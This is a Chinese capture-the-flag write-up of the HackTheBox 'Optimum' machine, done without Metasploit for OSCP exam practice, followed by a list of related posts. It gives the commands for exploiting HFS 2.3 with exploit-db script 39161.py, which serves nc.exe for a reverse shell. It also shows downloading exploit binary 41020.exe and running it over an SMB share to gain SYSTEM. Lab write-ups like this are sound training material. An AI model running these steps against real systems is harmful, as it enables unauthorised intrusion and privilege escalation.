hackthebox-optimum(考点:hfs/windows)不用msf
用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者,本篇文章不用msf
1、nmap
就一个80,提示是HFS 2.3
2、 hfs漏洞利用
直接搜searchsploit hfs
用python比较方便,就选择39161.py
打开py看看,有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc,而且还是从本机的http里使用 nc.exe。
思路就是用python打开 自己的http服务器python -m SimpleHTTPServer 80
,再把nc.exe放到服务器的路径里。你在哪个路径下打开,就把nc放到哪里。
按要求执行python 39161.py 10.10.10.8 80
看这脚本应该是多次调用,所以要多试几次
本机监听,收到shell
3、提权
接下来就是找提权漏洞了
可以先systeminfo查看系统版本信息,再用常用的这个工具
python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls
有挺多的,我试了几个都不行,浪费时间。。。。
最后这个行得通。
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
因为是Windows,所以习惯用smbserver 此处下载 的服务传送&执行,很方便。以前的文章里写过很多操作的方法了。
把41020.exe放到我本机的共享文件夹里。路径自己定。开启
python smbserver.py Share '/root/exp'
在shell里直接执行
\\10.10.14.57\share\41020.exe
直接搞定。。
hackthebox-optimum(考点:hfs/windows)不用msf相关推荐
- Windows不用虚拟机或双系统,轻松实现linux shell环境:gitforwindows
windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...
- 服务器windows模拟linux环境,科学网—Windows不用虚拟机或双系统,轻松实现shell环境:gitforwindows - 刘永鑫的博文...
windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...
- vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)
这个靶机前面考exe文件的缓冲区溢出,后面的提权方法还有对linux-elf文件的缓冲区溢出.可以熟悉ollydbg &immunitydebugger & gdb 几个常用调试工具和 ...
- HackTheBox::Optimum
0x00信息收集 nmap -Pn -sV 10.10.10.8 查看80端口的服务,得到使用的服务为HFS,且版本信息为2.3 通过expliot-db找到可利用的漏洞点 0x00 漏洞利用 下载相 ...
- Linux 隐藏Windows,如何在windows不用软件隐藏重要文件
每个人电脑里面都有些秘密,但是别人需要使用你的电脑时,有可能会看到,但是我们又不想让别人发现时,我们可以将其隐藏,那么别人就不会看到了.360文件保险柜.腾讯电脑管家等等.使用软件繁琐软件过大还会拖慢 ...
- 专升本-计算机公共课考点(2)——Windows 7 操作系统
专升本-计算机公共课考点分析 Windows 7 操作系统 26. 操作系统的概念 27. 操作系统的功能 28. 操作系统的主要特征 29. 操作系统的分类 30. 常用操作系统简介 31. Win ...
- 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...
- 网络安全-木马入侵windows -msfvenom反弹shell(CMD)
网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...
- windows API 串口编程参考
*************************************************** 更多精彩,欢迎进入:http://shop115376623.taobao.com ****** ...
最新文章
- 自动编码器的评级预测
- C#判断文件是否存在方法
- 概率编程库Edward安装
- java 唯一id生成算法_分布式全局唯一ID生成方案之snowflake算法
- 数据结构:表达式之中缀转后缀
- libuv / 编译 libuv 1.30 过程说明(静态库)
- 从零开始构建一个的asp.net Core 项目(一)
- 程序员减压方法100%有效
- C++ opengl 纹理生成
- 回炉重造-数据结构之数组列表
- 获取当地天气_6 点起来看天气预报?正经人谁看天气预报,原来是为了看她
- java左右连接sql写法,join用不了了 sql语句写法,不用join
- C++自增自减运算符简单记录
- 6.6 AdaBoost实战
- 【语音播放】基于matlab GUI MP3设计【含Matlab源码 425期】
- kitti raw数据处理--跑vins
- Eviews9.0---软件安装
- 线性代数让我想想:两步得到二阶矩阵的逆
- 用tensorflow实现一个分形图制作
- 使用GF集进行构型综合的方法之总结
热门文章
- 华为员工利用Bug越权访问机密卖给第三方,获利1.6万元,被判有期徒刑一年
- 自有App小程序第三方微信授权登录的实现
- mariadb集群与nginx负载均衡配置--centos7版本
- Idea相关操作以及相关问题
- bzoj4774 修路
- 简报a4纸的html页面,简报模板
- java通过反射调用方法_Java_通过反射调用类中的方法
- 玩转群晖NAS套件系列五:Moments的安装与使用保姆级教程!
- 怎么把Android手机号码导入,手机联系人怎么导入?通讯录vcf导入安卓手机的方法...
- 可能是目前为止全网最好的介绍分布式系统原理的中文文档!